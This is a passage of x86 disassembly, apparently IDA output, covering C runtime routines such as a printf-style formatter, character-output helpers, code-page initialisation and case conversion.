test byte ptr [ebp+var_4+1], 8
jz short loc_420294
movsx eax, word ptr [eax]
shr eax, 1
mov [ebp+var_8], ecx
mov [ebp+var_C], eax
mov [ebp+var_24], 1
jmp loc_420549
; ---------------------------------------------------------------------------
loc_420294: ; CODE XREF: sub_41FF3F+33C�j
and [ebp+var_24], 0
mov [ebp+var_8], ecx
movsx eax, word ptr [eax]
jmp loc_420546
; ---------------------------------------------------------------------------
loc_4202A3: ; CODE XREF: sub_41FF3F+32F�j
; sub_41FF3F+336�j
mov eax, off_43D090
mov [ebp+var_8], eax
push eax
jmp loc_42033F
; ---------------------------------------------------------------------------
loc_4202B1: ; CODE XREF: sub_41FF3F+29D�j
jnz short loc_4202BF
cmp bl, 67h
jnz short loc_4202BF
mov [ebp+var_10], 1
loc_4202BF: ; CODE XREF: sub_41FF3F+2AA�j
; sub_41FF3F:loc_4202B1�j ...
mov eax, [ebp+arg_8]
push [ebp+var_34]
add eax, 8
mov [ebp+arg_8], eax
push [ebp+var_10]
mov ecx, [eax-8]
mov [ebp+var_48], ecx
mov eax, [eax-4]
mov [ebp+var_44], eax
movsx eax, bl
push eax
lea eax, [ebp+var_248]
push eax
lea eax, [ebp+var_48]
push eax
call off_43D420
mov esi, [ebp+var_4]
add esp, 14h
and esi, 80h
jz short loc_420311
cmp [ebp+var_10], 0
jnz short loc_420311
lea eax, [ebp+var_248]
push eax
call off_43D42C
pop ecx
loc_420311: ; CODE XREF: sub_41FF3F+3BC�j
; sub_41FF3F+3C2�j
cmp bl, 67h
jnz short loc_420328
test esi, esi
jnz short loc_420328
lea eax, [ebp+var_248]
push eax
call off_43D424
pop ecx
loc_420328: ; CODE XREF: sub_41FF3F+3D5�j
; sub_41FF3F+3D9�j
cmp [ebp+var_248], 2Dh
jnz short loc_42033E
or byte ptr [ebp+var_4+1], 1
lea edi, [ebp+var_247]
mov [ebp+var_8], edi
loc_42033E: ; CODE XREF: sub_41FF3F+3F0�j
push edi
loc_42033F: ; CODE XREF: sub_41FF3F+36D�j
call sub_41B9C0
pop ecx
jmp loc_420546
; ---------------------------------------------------------------------------
loc_42034A: ; CODE XREF: sub_41FF3F+1E9�j
sub eax, 69h
jz loc_420424
sub eax, 5
jz loc_4203FA
dec eax
jz loc_4203E7
dec eax
jz short loc_4203B7
sub eax, 3
jz loc_42016C
dec eax
dec eax
jz loc_420428
sub eax, 3
jnz loc_420549
mov [ebp+var_2C], 27h
jmp short loc_4203C5
; ---------------------------------------------------------------------------
loc_420389: ; CODE XREF: sub_41FF3F+270�j
; sub_41FF3F+27A�j
sub eax, ecx
sar eax, 1
jmp loc_420546
; ---------------------------------------------------------------------------
loc_420392: ; CODE XREF: sub_41FF3F+24F�j
test ecx, ecx
jnz short loc_42039F
mov ecx, off_43D090
mov [ebp+var_8], ecx
loc_42039F: ; CODE XREF: sub_41FF3F+455�j
mov eax, ecx
loc_4203A1: ; CODE XREF: sub_41FF3F+46F�j
mov edx, esi
dec esi
test edx, edx
jz short loc_4203B0
cmp byte ptr [eax], 0
jz short loc_4203B0
inc eax
jmp short loc_4203A1
; ---------------------------------------------------------------------------
loc_4203B0: ; CODE XREF: sub_41FF3F+467�j
; sub_41FF3F+46C�j
sub eax, ecx
jmp loc_420546
; ---------------------------------------------------------------------------
loc_4203B7: ; CODE XREF: sub_41FF3F+425�j
mov [ebp+var_10], 8
loc_4203BE: ; CODE XREF: sub_41FF3F+201�j
mov [ebp+var_2C], 7
loc_4203C5: ; CODE XREF: sub_41FF3F+448�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 10h
jz short loc_42042F
mov al, byte ptr [ebp+var_2C]
mov [ebp+var_16], 30h
add al, 51h
mov [ebp+var_1C], 2
mov [ebp+var_15], al
jmp short loc_42042F
; ---------------------------------------------------------------------------
loc_4203E7: ; CODE XREF: sub_41FF3F+41E�j
test byte ptr [ebp+var_4], 80h
mov [ebp+var_C], 8
jz short loc_42042F
or byte ptr [ebp+var_4+1], 2
jmp short loc_42042F
; ---------------------------------------------------------------------------
loc_4203FA: ; CODE XREF: sub_41FF3F+417�j
lea eax, [ebp+arg_8]
push eax
call sub_42071E
test byte ptr [ebp+var_4], 20h
pop ecx
jz short loc_420413
mov cx, word ptr [ebp+var_14]
mov [eax], cx
jmp short loc_420418
; ---------------------------------------------------------------------------
loc_420413: ; CODE XREF: sub_41FF3F+4C9�j
mov ecx, [ebp+var_14]
mov [eax], ecx
loc_420418: ; CODE XREF: sub_41FF3F+4D2�j
mov [ebp+var_28], 1
jmp loc_420647 ; default
; ---------------------------------------------------------------------------
loc_420424: ; CODE XREF: sub_41FF3F+2F7�j
; sub_41FF3F+40E�j
or [ebp+var_4], 40h
loc_420428: ; CODE XREF: sub_41FF3F+432�j
mov [ebp+var_C], 0Ah
loc_42042F: ; CODE XREF: sub_41FF3F+491�j
; sub_41FF3F+4A6�j ...
test byte ptr [ebp+var_4+1], 80h
jz short loc_420441
lea eax, [ebp+arg_8]
push eax
call sub_42072B
pop ecx
jmp short loc_420482
; ---------------------------------------------------------------------------
loc_420441: ; CODE XREF: sub_41FF3F+4F4�j
test byte ptr [ebp+var_4], 20h
jz short loc_420468
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_42045D
call sub_42071E
pop ecx
movsx eax, ax
loc_42045A: ; CODE XREF: sub_41FF3F+527�j
; sub_41FF3F+539�j
cdq
jmp short loc_420482
; ---------------------------------------------------------------------------
loc_42045D: ; CODE XREF: sub_41FF3F+510�j
call sub_42071E
pop ecx
movzx eax, ax
jmp short loc_42045A
; ---------------------------------------------------------------------------
loc_420468: ; CODE XREF: sub_41FF3F+506�j
test byte ptr [ebp+var_4], 40h
lea eax, [ebp+arg_8]
push eax
jz short loc_42047A
call sub_42071E
pop ecx
jmp short loc_42045A
; ---------------------------------------------------------------------------
loc_42047A: ; CODE XREF: sub_41FF3F+531�j
call sub_42071E
pop ecx
xor edx, edx
loc_420482: ; CODE XREF: sub_41FF3F+500�j
; sub_41FF3F+51C�j
test byte ptr [ebp+var_4], 40h
jz short loc_4204A3
test edx, edx
jg short loc_4204A3
jl short loc_420492
test eax, eax
jnb short loc_4204A3
loc_420492: ; CODE XREF: sub_41FF3F+54D�j
neg eax
adc edx, 0
mov esi, eax
neg edx
or byte ptr [ebp+var_4+1], 1
mov edi, edx
jmp short loc_4204A7
; ---------------------------------------------------------------------------
loc_4204A3: ; CODE XREF: sub_41FF3F+547�j
; sub_41FF3F+54B�j ...
mov esi, eax
mov edi, edx
loc_4204A7: ; CODE XREF: sub_41FF3F+562�j
test byte ptr [ebp+var_4+1], 80h
jnz short loc_4204B0
and edi, 0
loc_4204B0: ; CODE XREF: sub_41FF3F+56C�j
cmp [ebp+var_10], 0
jge short loc_4204BF
mov [ebp+var_10], 1
jmp short loc_4204C3
; ---------------------------------------------------------------------------
loc_4204BF: ; CODE XREF: sub_41FF3F+575�j
and [ebp+var_4], 0FFFFFFF7h
loc_4204C3: ; CODE XREF: sub_41FF3F+57E�j
mov eax, esi
or eax, edi
jnz short loc_4204CD
and [ebp+var_1C], 0
loc_4204CD: ; CODE XREF: sub_41FF3F+588�j
lea eax, [ebp+var_49]
mov [ebp+var_8], eax
loc_4204D3: ; CODE XREF: sub_41FF3F+5DD�j
mov eax, [ebp+var_10]
dec [ebp+var_10]
test eax, eax
jg short loc_4204E3
mov eax, esi
or eax, edi
jz short loc_42051E
loc_4204E3: ; CODE XREF: sub_41FF3F+59C�j
mov eax, [ebp+var_C]
cdq
push edx
push eax
push edi
push esi
mov [ebp+var_40], eax
mov [ebp+var_3C], edx
call sub_41DD20
push [ebp+var_3C]
mov ebx, eax
add ebx, 30h
push [ebp+var_40]
push edi
push esi
call sub_41DCB0
cmp ebx, 39h
mov esi, eax
mov edi, edx
jle short loc_420514
add ebx, [ebp+var_2C]
loc_420514: ; CODE XREF: sub_41FF3F+5D0�j
mov eax, [ebp+var_8]
dec [ebp+var_8]
mov [eax], bl
jmp short loc_4204D3
; ---------------------------------------------------------------------------
loc_42051E: ; CODE XREF: sub_41FF3F+5A2�j
lea eax, [ebp+var_49]
sub eax, [ebp+var_8]
inc [ebp+var_8]
test byte ptr [ebp+var_4+1], 2
mov [ebp+var_C], eax
jz short loc_420549
mov ecx, [ebp+var_8]
cmp byte ptr [ecx], 30h
jnz short loc_42053C
test eax, eax
jnz short loc_420549
loc_42053C: ; CODE XREF: sub_41FF3F+5F7�j
dec [ebp+var_8]
inc eax
mov ecx, [ebp+var_8]
mov byte ptr [ecx], 30h
loc_420546: ; CODE XREF: sub_41FF3F+35F�j
; sub_41FF3F+406�j ...
mov [ebp+var_C], eax
loc_420549: ; CODE XREF: sub_41FF3F+21B�j
; sub_41FF3F+2FD�j ...
cmp [ebp+var_28], 0
jnz loc_420647 ; default
mov ebx, [ebp+var_4]
test bl, 40h
jz short loc_420581
test bh, 1
jz short loc_420566
mov [ebp+var_16], 2Dh
jmp short loc_42057A
; ---------------------------------------------------------------------------
loc_420566: ; CODE XREF: sub_41FF3F+61F�j
test bl, 1
jz short loc_420571
mov [ebp+var_16], 2Bh
jmp short loc_42057A
; ---------------------------------------------------------------------------
loc_420571: ; CODE XREF: sub_41FF3F+62A�j
test bl, 2
jz short loc_420581
mov [ebp+var_16], 20h
loc_42057A: ; CODE XREF: sub_41FF3F+625�j
; sub_41FF3F+630�j
mov [ebp+var_1C], 1
loc_420581: ; CODE XREF: sub_41FF3F+61A�j
; sub_41FF3F+635�j
mov esi, [ebp+var_20]
sub esi, [ebp+var_1C]
sub esi, [ebp+var_C]
test bl, 0Ch
jnz short loc_4205A1
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4206B5
add esp, 10h
loc_4205A1: ; CODE XREF: sub_41FF3F+64E�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_16]
push [ebp+arg_0]
push [ebp+var_1C]
push eax
call sub_4206E6
add esp, 10h
test bl, 8
jz short loc_4205D3
test bl, 4
jnz short loc_4205D3
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 30h
call sub_4206B5
add esp, 10h
loc_4205D3: ; CODE XREF: sub_41FF3F+67B�j
; sub_41FF3F+680�j
cmp [ebp+var_24], 0
jz short loc_42061A
cmp [ebp+var_C], 0
jle short loc_42061A
mov eax, [ebp+var_C]
mov ebx, [ebp+var_8]
lea edi, [eax-1]
loc_4205E8: ; CODE XREF: sub_41FF3F+6D7�j
mov ax, [ebx]
inc ebx
push eax
lea eax, [ebp+var_38]
push eax
inc ebx
call sub_424663
pop ecx
test eax, eax
pop ecx
jle short loc_42062F
lea ecx, [ebp+var_14]
push ecx
push [ebp+arg_0]
push eax
lea eax, [ebp+var_38]
push eax
call sub_4206E6
add esp, 10h
mov eax, edi
dec edi
test eax, eax
jnz short loc_4205E8
jmp short loc_42062F
; ---------------------------------------------------------------------------
loc_42061A: ; CODE XREF: sub_41FF3F+698�j
; sub_41FF3F+69E�j
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push [ebp+var_C]
push [ebp+var_8]
call sub_4206E6
add esp, 10h
loc_42062F: ; CODE XREF: sub_41FF3F+6BC�j
; sub_41FF3F+6D9�j
test byte ptr [ebp+var_4], 4
jz short loc_420647 ; default
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
push esi
push 20h
call sub_4206B5
add esp, 10h
loc_420647: ; CODE XREF: sub_41FF3F+68�j
; sub_41FF3F+8B�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
inc edi
test bl, bl
mov [ebp+arg_4], edi
jnz loc_41FF6B
loc_420658: ; CODE XREF: sub_41FF3F+1F�j
; sub_41FF3F+37�j
mov eax, [ebp+var_14]
pop edi
pop esi
pop ebx
leave
retn
sub_41FF3F endp
; ---------------------------------------------------------------------------
off_420660 dd offset loc_4200DE ; DATA XREF: sub_41FF3F+6E�r
dd offset loc_41FFB4 ; jump table for switch statement
dd offset loc_41FFCF
dd offset loc_42001B
dd offset loc_420052
dd offset loc_42005A
dd offset loc_42008F
dd offset loc_420122
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420680 proc near ; CODE XREF: sub_41FF3F+1BD�p
; sub_41FF3F+1D6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
dec dword ptr [ecx+4]
js short loc_420699
mov edx, [ecx]
mov al, byte ptr [ebp+arg_0]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_4206A4
; ---------------------------------------------------------------------------
loc_420699: ; CODE XREF: sub_420680+9�j
push ecx
push [ebp+arg_0]
call sub_41FE2A
pop ecx
pop ecx
loc_4206A4: ; CODE XREF: sub_420680+17�j
cmp eax, 0FFFFFFFFh
mov eax, [ebp+arg_8]
jnz short loc_4206B1
or dword ptr [eax], 0FFFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4206B1: ; CODE XREF: sub_420680+2A�j
inc dword ptr [eax]
pop ebp
retn
sub_420680 endp
; =============== S U B R O U T I N E =======================================
sub_4206B5 proc near ; CODE XREF: sub_41FF3F+65A�p
; sub_41FF3F+68C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
push edi
mov edi, [esp+8+arg_4]
mov eax, edi
dec edi
test eax, eax
jle short loc_4206E3
mov esi, [esp+8+arg_C]
loc_4206C6: ; CODE XREF: sub_4206B5+2C�j
push esi
push [esp+0Ch+arg_8]
push [esp+10h+arg_0]
call sub_420680
add esp, 0Ch
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_4206E3
mov eax, edi
dec edi
test eax, eax
jg short loc_4206C6
loc_4206E3: ; CODE XREF: sub_4206B5+B�j
; sub_4206B5+25�j
pop edi
pop esi
retn
sub_4206B5 endp
; =============== S U B R O U T I N E =======================================
sub_4206E6 proc near ; CODE XREF: sub_41FF3F+670�p
; sub_41FF3F+6CA�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov ebx, [esp+4+arg_4]
mov eax, ebx
dec ebx
push esi
push edi
test eax, eax
jle short loc_42071A
mov edi, [esp+0Ch+arg_C]
mov esi, [esp+0Ch+arg_0]
loc_4206FC: ; CODE XREF: sub_4206E6+32�j
movsx eax, byte ptr [esi]
push edi
inc esi
push [esp+10h+arg_8]
push eax
call sub_420680
add esp, 0Ch
cmp dword ptr [edi], 0FFFFFFFFh
jz short loc_42071A
mov eax, ebx
dec ebx
test eax, eax
jg short loc_4206FC
loc_42071A: ; CODE XREF: sub_4206E6+C�j
; sub_4206E6+2B�j
pop edi
pop esi
pop ebx
retn
sub_4206E6 endp
; =============== S U B R O U T I N E =======================================
sub_42071E proc near ; CODE XREF: sub_41FF3F+E5�p
; sub_41FF3F+124�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov eax, [eax-4]
retn
sub_42071E endp
; =============== S U B R O U T I N E =======================================
sub_42072B proc near ; CODE XREF: sub_41FF3F+4FA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 8
mov ecx, [eax]
mov eax, [ecx-8]
mov edx, [ecx-4]
retn
sub_42072B endp
; =============== S U B R O U T I N E =======================================
sub_42073B proc near ; CODE XREF: sub_41FF3F+2C7�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add dword ptr [eax], 4
mov eax, [eax]
mov ax, [eax-4]
retn
sub_42073B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420749 proc near ; CODE XREF: sub_420B0D+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_4208E2 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, dword_4DD144
mov [ebp+arg_0], esi
jz loc_4208D6
xor ebx, ebx
cmp esi, ebx
jz loc_4208CC
xor edx, edx
mov eax, offset dword_43D0A0
loc_42077D: ; CODE XREF: sub_420749+41�j
cmp [eax], esi
jz short loc_4207F3
add eax, 30h
inc edx
cmp eax, offset dword_43D190
jl short loc_42077D
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_42705C ; GetCPInfo
cmp eax, 1
jnz loc_4208C4
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4DD260
cmp [ebp+var_18], 1
mov dword_4DD144, esi
rep stosd
stosb
mov dword_4DD364, ebx
jbe loc_4208B2
cmp [ebp+var_12], 0
jz loc_420888
lea ecx, [ebp+var_11]
loc_4207D0: ; CODE XREF: sub_420749+139�j
mov dl, [ecx]
test dl, dl
jz loc_420888
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_4207E1: ; CODE XREF: sub_420749+A8�j
cmp eax, edx
ja loc_42087C
or byte_4DD261[eax], 4
inc eax
jmp short loc_4207E1
; ---------------------------------------------------------------------------
loc_4207F3: ; CODE XREF: sub_420749+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4DD260
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_43D0B0[esi]
loc_42080F: ; CODE XREF: sub_420749+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_420842
loc_420816: ; CODE XREF: sub_420749+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_420842
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_42083B
mov edx, [ebp+var_4]
mov dl, byte_43D098[edx]
loc_420830: ; CODE XREF: sub_420749+F0�j
or byte_4DD261[eax], dl
inc eax
cmp eax, edi
jbe short loc_420830
loc_42083B: ; CODE XREF: sub_420749+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_420816
loc_420842: ; CODE XREF: sub_420749+CB�j
; sub_420749+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_42080F
mov eax, [ebp+arg_0]
mov dword_4DD15C, 1
push eax
mov dword_4DD144, eax
call sub_42092C
lea esi, dword_43D0A4[esi]
mov edi, offset dword_4DD150
movsd
movsd
pop ecx
mov dword_4DD364, eax
movsd
jmp short loc_4208D1
; ---------------------------------------------------------------------------
loc_42087C: ; CODE XREF: sub_420749+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_4207D0
loc_420888: ; CODE XREF: sub_420749+7E�j
; sub_420749+8B�j
push 1
pop eax
loc_42088B: ; CODE XREF: sub_420749+14F�j
or byte_4DD261[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_42088B
push esi
call sub_42092C
pop ecx
mov dword_4DD364, eax
mov dword_4DD15C, 1
jmp short loc_4208B8
; ---------------------------------------------------------------------------
loc_4208B2: ; CODE XREF: sub_420749+74�j
mov dword_4DD15C, ebx
loc_4208B8: ; CODE XREF: sub_420749+167�j
xor eax, eax
mov edi, offset dword_4DD150
stosd
stosd
stosd
jmp short loc_4208D1
; ---------------------------------------------------------------------------
loc_4208C4: ; CODE XREF: sub_420749+51�j
cmp dword_4DBE4C, ebx
jz short loc_4208DA
loc_4208CC: ; CODE XREF: sub_420749+27�j
call sub_42095F
loc_4208D1: ; CODE XREF: sub_420749+131�j
; sub_420749+179�j
call sub_420988
loc_4208D6: ; CODE XREF: sub_420749+1D�j
xor eax, eax
jmp short loc_4208DD
; ---------------------------------------------------------------------------
loc_4208DA: ; CODE XREF: sub_420749+181�j
or eax, 0FFFFFFFFh
loc_4208DD: ; CODE XREF: sub_420749+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_420749 endp
; =============== S U B R O U T I N E =======================================
sub_4208E2 proc near ; CODE XREF: sub_420749+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and dword_4DBE4C, 0
cmp eax, 0FFFFFFFEh
jnz short loc_420902
mov dword_4DBE4C, 1
jmp ds:dword_427054
; ---------------------------------------------------------------------------
loc_420902: ; CODE XREF: sub_4208E2+E�j
cmp eax, 0FFFFFFFDh
jnz short loc_420917
mov dword_4DBE4C, 1
jmp ds:dword_427058
; ---------------------------------------------------------------------------
loc_420917: ; CODE XREF: sub_4208E2+23�j
cmp eax, 0FFFFFFFCh
jnz short locret_42092B
mov eax, dword_4DBE94
mov dword_4DBE4C, 1
locret_42092B: ; CODE XREF: sub_4208E2+38�j
retn
sub_4208E2 endp
; =============== S U B R O U T I N E =======================================
sub_42092C proc near ; CODE XREF: sub_420749+118�p
; sub_420749+152�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
sub eax, 3A4h
jz short loc_420959
sub eax, 4
jz short loc_420953
sub eax, 0Dh
jz short loc_42094D
dec eax
jz short loc_420947
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_420947: ; CODE XREF: sub_42092C+16�j
mov eax, 404h
retn
; ---------------------------------------------------------------------------
loc_42094D: ; CODE XREF: sub_42092C+13�j
mov eax, 412h
retn
; ---------------------------------------------------------------------------
loc_420953: ; CODE XREF: sub_42092C+E�j
mov eax, 804h
retn
; ---------------------------------------------------------------------------
loc_420959: ; CODE XREF: sub_42092C+9�j
mov eax, 411h
retn
sub_42092C endp
; =============== S U B R O U T I N E =======================================
sub_42095F proc near ; CODE XREF: sub_420749:loc_4208CC�p
push edi
push 40h
pop ecx
xor eax, eax
mov edi, offset byte_4DD260
rep stosd
stosb
xor eax, eax
mov edi, offset dword_4DD150
mov dword_4DD144, eax
mov dword_4DD15C, eax
mov dword_4DD364, eax
stosd
stosd
stosd
pop edi
retn
sub_42095F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420988 proc near ; CODE XREF: sub_420749:loc_4208D1�p
var_514 = byte ptr -514h
var_314 = byte ptr -314h
var_214 = byte ptr -214h
var_114 = byte ptr -114h
var_14 = byte ptr -14h
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
push ebp
mov ebp, esp
sub esp, 514h
lea eax, [ebp+var_14]
push esi
push eax
push dword_4DD144
call ds:dword_42705C ; GetCPInfo
cmp eax, 1
jnz loc_420AC1
xor eax, eax
mov esi, 100h
loc_4209B2: ; CODE XREF: sub_420988+34�j
mov [ebp+eax+var_114], al
inc eax
cmp eax, esi
jb short loc_4209B2
mov al, [ebp+var_E]
mov [ebp+var_114], 20h
test al, al
jz short loc_420A03
push ebx
push edi
lea edx, [ebp+var_D]
loc_4209D1: ; CODE XREF: sub_420988+77�j
movzx ecx, byte ptr [edx]
movzx eax, al
cmp eax, ecx
ja short loc_4209F8
sub ecx, eax
lea edi, [ebp+eax+var_114]
inc ecx
mov eax, 20202020h
mov ebx, ecx
shr ecx, 2
rep stosd
mov ecx, ebx
and ecx, 3
rep stosb
loc_4209F8: ; CODE XREF: sub_420988+51�j
inc edx
inc edx
mov al, [edx-1]
test al, al
jnz short loc_4209D1
pop edi
pop ebx
loc_420A03: ; CODE XREF: sub_420988+42�j
push 0
lea eax, [ebp+var_514]
push dword_4DD364
push dword_4DD144
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 1
call sub_4244F4
push 0
lea eax, [ebp+var_214]
push dword_4DD144
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push esi
push dword_4DD364
call sub_4232A8
push 0
lea eax, [ebp+var_314]
push dword_4DD144
push esi
push eax
lea eax, [ebp+var_114]
push esi
push eax
push 200h
push dword_4DD364
call sub_4232A8
add esp, 5Ch
xor eax, eax
lea ecx, [ebp+var_514]
loc_420A7E: ; CODE XREF: sub_420988+135�j
mov dx, [ecx]
test dl, 1
jz short loc_420A9C
or byte_4DD261[eax], 10h
mov dl, [ebp+eax+var_214]
loc_420A94: ; CODE XREF: sub_420988+127�j
mov byte_4DD160[eax], dl
jmp short loc_420AB8
; ---------------------------------------------------------------------------
loc_420A9C: ; CODE XREF: sub_420988+FC�j
test dl, 2
jz short loc_420AB1
or byte_4DD261[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_420A94
; ---------------------------------------------------------------------------
loc_420AB1: ; CODE XREF: sub_420988+117�j
and byte_4DD160[eax], 0
loc_420AB8: ; CODE XREF: sub_420988+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_420A7E
jmp short loc_420B0A
; ---------------------------------------------------------------------------
loc_420AC1: ; CODE XREF: sub_420988+1D�j
xor eax, eax
mov esi, 100h
loc_420AC8: ; CODE XREF: sub_420988+180�j
cmp eax, 41h
jb short loc_420AE6
cmp eax, 5Ah
ja short loc_420AE6
or byte_4DD261[eax], 10h
mov cl, al
add cl, 20h
loc_420ADE: ; CODE XREF: sub_420988+174�j
mov byte_4DD160[eax], cl
jmp short loc_420B05
; ---------------------------------------------------------------------------
loc_420AE6: ; CODE XREF: sub_420988+143�j
; sub_420988+148�j
cmp eax, 61h
jb short loc_420AFE
cmp eax, 7Ah
ja short loc_420AFE
or byte_4DD261[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_420ADE
; ---------------------------------------------------------------------------
loc_420AFE: ; CODE XREF: sub_420988+161�j
; sub_420988+166�j
and byte_4DD160[eax], 0
loc_420B05: ; CODE XREF: sub_420988+15C�j
inc eax
cmp eax, esi
jb short loc_420AC8
loc_420B0A: ; CODE XREF: sub_420988+137�j
pop esi
leave
retn
sub_420988 endp
; =============== S U B R O U T I N E =======================================
sub_420B0D proc near ; CODE XREF: sub_42367B+9�p
; sub_4236D3+D�p ...
cmp dword_4DD394, 0
jnz short locret_420B28
push 0FFFFFFFDh
call sub_420749
pop ecx
mov dword_4DD394, 1
locret_420B28: ; CODE XREF: sub_420B0D+7�j
retn
sub_420B0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420B29 proc near ; CODE XREF: sub_41C3B1+2B�p
; sub_41C3B1+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp dword_4DD15C, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_420B4D
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_41BFD0
add esp, 0Ch
jmp short loc_420BB0
; ---------------------------------------------------------------------------
loc_420B4D: ; CODE XREF: sub_420B29+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_420B92
mov ecx, [ebp+arg_4]
loc_420B58: ; CODE XREF: sub_420B29+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test byte_4DD261[esi], 4
mov [edi], al
jz short loc_420B7C
inc edi
inc ecx
test edx, edx
jz short loc_420B88
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_420B8E
jmp short loc_420B82
; ---------------------------------------------------------------------------
loc_420B7C: ; CODE XREF: sub_420B29+3E�j
inc edi
inc ecx
test al, al
jz short loc_420B92
loc_420B82: ; CODE XREF: sub_420B29+51�j
test edx, edx
jnz short loc_420B58
jmp short loc_420B92
; ---------------------------------------------------------------------------
loc_420B88: ; CODE XREF: sub_420B29+44�j
and byte ptr [edi-1], 0
jmp short loc_420B92
; ---------------------------------------------------------------------------
loc_420B8E: ; CODE XREF: sub_420B29+4F�j
and byte ptr [edi-2], 0
loc_420B92: ; CODE XREF: sub_420B29+2A�j
; sub_420B29+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_420BAD
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_420BAD: ; CODE XREF: sub_420B29+6F�j
mov eax, [ebp+arg_0]
loc_420BB0: ; CODE XREF: sub_420B29+22�j
pop edi
pop ebp
retn
sub_420B29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420BB3 proc near ; CODE XREF: sub_41C59D+12B�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_4DBE84, 0
push ebx
jnz short loc_420BDE
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_420C7C
cmp eax, 7Ah
jg loc_420C7C
sub eax, 20h
jmp loc_420C7C
; ---------------------------------------------------------------------------
loc_420BDE: ; CODE XREF: sub_420BB3+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_420C11
cmp dword_43D084, 1
jle short loc_420BFE
push 2
push ebx
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_420C09
; ---------------------------------------------------------------------------
loc_420BFE: ; CODE XREF: sub_420BB3+3D�j
mov eax, off_43CE78
mov al, [eax+ebx*2]
and eax, 2
loc_420C09: ; CODE XREF: sub_420BB3+49�j
test eax, eax
jnz short loc_420C11
loc_420C0D: ; CODE XREF: sub_420BB3+AF�j
mov eax, ebx
jmp short loc_420C7C
; ---------------------------------------------------------------------------
loc_420C11: ; CODE XREF: sub_420BB3+34�j
; sub_420BB3+58�j
mov edx, off_43CE78
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_420C34
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_420C3D
; ---------------------------------------------------------------------------
loc_420C34: ; CODE XREF: sub_420BB3+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_420C3D: ; CODE XREF: sub_420BB3+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
